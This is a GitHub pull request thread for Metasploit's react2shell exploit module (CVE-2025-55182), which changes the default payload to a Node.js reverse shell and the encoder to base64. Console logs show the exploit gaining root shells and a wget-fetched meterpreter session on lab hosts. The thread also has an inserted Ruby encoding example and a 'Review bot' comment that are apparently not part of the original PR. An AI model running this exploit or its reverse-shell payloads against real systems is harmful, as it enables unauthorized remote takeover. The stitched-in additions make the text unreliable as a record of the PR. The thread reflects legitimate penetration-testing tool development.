
@jheysel-r7
Contributor

This PR changes the default payload for the react2shell module to use a nodejs payload. This will help pro users as previously the module was defaulting to an aarch64 payload and was not honoring the default value set for the FETCH_COMMAND datastore option. I believe this was what was requested as a temporary fix for these issues.

The module was hitting a payload length limitation when using cmd/unix/reverse_nodejs. Due to the badchar => '"' the payload needs to be encoded. The EncoderType selected by default was CmdPosixEcho which generates quite a large payload as each byte is sent as a \x prefixed hex encoded string: /bin/echo -ne '\x6e\x6f\x64\x65....

Explicitly setting the EncoderType to CmdPosixBase64 is much more efficient: echo bm9kZSAtZSAn....

When first attempting to minimize the payload size, the #nodejs_cmd method was changed to only encode chars that are not whitespace or alphanumeric. This significantly reduced the size of the payload and should probably stay in this PR.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use multi/http/react2shell_unauth_rce_cve_2025_55182
  • set rhosts, rport, lhost
  • run the module
  • Verify you get a session

Testing

msf > use multi/http/react2shell_unauth_rce_cve_2025_55182
[*] Using configured payload cmd/unix/reverse_nodejs
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set rport 3000
rport => 3000
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > options

Module options (exploit/multi/http/react2shell_unauth_rce_cve_2025_55182):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Path to the React App
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_nodejs):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT  4000             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command



View the full module info with the info, or info -d command.
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > run
[*] Started reverse TCP handler on 172.16.199.1:4000
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command shell session 1 opened (172.16.199.1:4000 -> 172.16.199.1:61025) at 2025-12-12 15:43:26 -0800
id

uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
uname -a
Linux 22471a211b95 6.12.54-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Nov  4 21:39:03 UTC 2025 x86_64 Linux
^C
Abort session 1? [y/N]  yy

[*] 127.0.0.1 - Command shell session 1 closed.  Reason: User exit
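The size difference the description attributes to the two encoders, as an added Ruby example that is not part of this PR or of Metasploit. The two encode_* functions are constructed approximations of the output shapes quoted above (/bin/echo -ne '\x..' and echo <base64>), not the Rex CmdPosixEcho/CmdPosixBase64 encoders themselves; js_escape_selective is an assumed reading of the "only encode chars that are not whitespace or alphanumeric" change to #nodejs_cmd, shown beside the exhaustive form it replaced. The command being encoded is a benign, constructed stand-in that merely prints the Node version; it contains both quote characters so the badchar => '"' case is exercised.

```ruby
require 'base64'

# Constructed, benign stand-in for a command payload (prints the Node version).
# It contains both quote characters, so it exercises the badchar => '"' case.
SAMPLE_CMD = %q{node -e 'console.log("hello from node " + process.version)'}.freeze

# Badchar the module declares: a literal double quote must not appear in the
# command that reaches the target.
BADCHARS = ['"'].freeze

# Echo-style encoder (approximation of the CmdPosixEcho shape, not Rex's code):
# every byte becomes a \xNN escape, so the encoded form is ~4x the original.
def encode_echo_hex(cmd)
  hex = cmd.each_byte.map { |b| format('\\x%02x', b) }.join
  "/bin/echo -ne '#{hex}' | sh"
end

# Base64-style encoder (approximation of the CmdPosixBase64 shape): ~4/3 the
# original, and the base64 alphabet never contains a double quote.
def encode_base64(cmd)
  "echo #{Base64.strict_encode64(cmd)} | base64 -d | sh"
end

def contains_badchars?(cmd, badchars = BADCHARS)
  badchars.any? { |c| cmd.include?(c) }
end

# Side-by-side byte counts for one command.
def compare_encoders(cmd)
  {
    original: cmd.bytesize,
    echo_hex: encode_echo_hex(cmd).bytesize,
    base64: encode_base64(cmd).bytesize
  }
end

# Selective JS escaping (assumed reading of the #nodejs_cmd change): leave
# alphanumerics and whitespace alone and \xNN-escape only the rest. No quote
# survives unescaped, so the result can sit inside a JS string literal.
def js_escape_selective(js)
  js.each_byte.map do |b|
    ch = b.chr
    ch =~ /[A-Za-z0-9\s]/ ? ch : format('\\x%02x', b)
  end.join
end

# The exhaustive form it replaced: every byte escaped.
def js_escape_full(js)
  js.each_byte.map { |b| format('\\x%02x', b) }.join
end

# Undo the \xNN escaping, to confirm both forms round-trip to the same source.
def js_unescape(escaped)
  escaped.gsub(/\\x([0-9a-f]{2})/) { Regexp.last_match(1).hex.chr }
end

if $PROGRAM_NAME == __FILE__
  compare_encoders(SAMPLE_CMD).each { |name, size| puts format('%-9s %4d bytes', name, size) }
  js = 'console.log("hello from node " + process.version)'
  puts "selective JS escape: #{js_escape_selective(js).bytesize} bytes"
  puts "full JS escape:      #{js_escape_full(js).bytesize} bytes"
end
```

Running it prints the three command sizes and the two JS-escape sizes; the echo form is more than four times the original, the base64 form well under half of that, and the selective escape only pays the 3-byte overhead for the handful of punctuation characters in the script.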

['URL', 'https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3']
],
'Platform' => ['multi'],
'Platform' => %w[unix linux win],
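Review bot: the replacement 'Platform' => %w[unix linux win] carries no comment explaining why an explicit list is needed in place of 'multi', and the list does not map one-to-one onto the module's targets (the module search output later in this thread shows only "Unix Command" and "Windows Command"). Since the testing below selects a cmd/linux fetch payload (cmd/linux/http/x64/meterpreter/reverse_tcp) on top of the default cmd/unix/reverse_nodejs, a one-line comment stating that linux is listed so that cmd/linux payloads stay selectable alongside the unix and win ones would stop a future reader from trimming the list back to unix/win and silently losing that payload set.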
Contributor


Why not 'multi'?

Contributor Author


Although it's placed in the exploits/multi folder, the platforms should be explicitly defined like so

Co-authored-by: Julien Voisin <[email protected]>
Contributor

@smcintyre-r7 smcintyre-r7 left a comment


Changes LGTM. Tested the new defaults with the docker container along with the older Meterpreter using the fetch payload. Switching to nodejs by default makes sense.

Metasploit tip: Use post/multi/manage/autoroute to automatically add 
pivot routes
                                                  

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!


       =[ metasploit v6.4.103-dev-ff188b8a5e                    ]
+ -- --=[ 2,584 exploits - 1,319 auxiliary - 1,694 payloads     ]
+ -- --=[ 433 post - 49 encoders - 14 nops - 9 evasion          ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

WARNING: Local file /home/smcintyre/Repositories/metasploit-framework/data/meterpreter/ext_server_stdapi.php is being used
WARNING: Local files may be incompatible with the Metasploit Framework
WARNING: Local file /home/smcintyre/Repositories/metasploit-framework/data/meterpreter/ext_server_stdapi.py is being used
WARNING: Local file /home/smcintyre/Repositories/metasploit-framework/data/meterpreter/meterpreter.php is being used
WARNING: Local file /home/smcintyre/Repositories/metasploit-framework/data/meterpreter/meterpreter.py is being used
msf payload(php/meterpreter/reverse_tcp) > use react2shell

msf payload(php/meterpreter/reverse_tcp) > use react2shell

Matching Modules
================

   #  Name                                                      Disclosure Date  Rank       Check  Description
   -  ----                                                      ---------------  ----       -----  -----------
   0  exploit/multi/http/react2shell_unauth_rce_cve_2025_55182  2025-12-03       excellent  Yes    Unauthenticated RCE in React and Next.js
   1    \_ target: Unix Command                                 .                .          .      .
   2    \_ target: Windows Command                              .                .          .      .


Interact with a module by name or index. For example info 2, use 2 or use exploit/multi/http/react2shell_unauth_rce_cve_2025_55182
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command'

[*] Using exploit/multi/http/react2shell_unauth_rce_cve_2025_55182
[*] Using configured payload cmd/unix/reverse_nodejs
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > show options 

Module options (exploit/multi/http/react2shell_unauth_rce_cve_2025_55182):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, socks5h,
                                          http, sapni, socks4
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit
                                         .html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Path to the React App
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_nodejs):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command



View the full module info with the info, or info -d command.

msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set RPORT 3000
RPORT => 3000
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > run
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command shell session 1 opened (192.168.159.128:4444 -> 192.168.159.128:43530) at 2025-12-15 14:58:05 -0500

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
pwd
/app
^C
Abort session 1? [y/N]  y

[*] 192.168.159.128 - Command shell session 1 closed.  Reason: User exit
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > run FETCH_COMMAND=wget
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (3090404 bytes) to 192.168.159.128
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.128:50692) at 2025-12-15 14:59:38 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.250.227
OS           :  (Linux 6.17.10-300.fc43.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down session: 2

[*] ::1 - Meterpreter session 2 closed.  Reason: Died
[*] ::1 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) 

@smcintyre-r7 smcintyre-r7 force-pushed the fix/react2shell_targets branch from fe69f21 to 0589121 Compare December 15, 2025 23:54
@smcintyre-r7 smcintyre-r7 merged commit 7477478 into rapid7:master Dec 15, 2025
31 of 46 checks passed
@smcintyre-r7
Contributor

Release Notes

This updates the exploit for React2Shell with a better default payload.
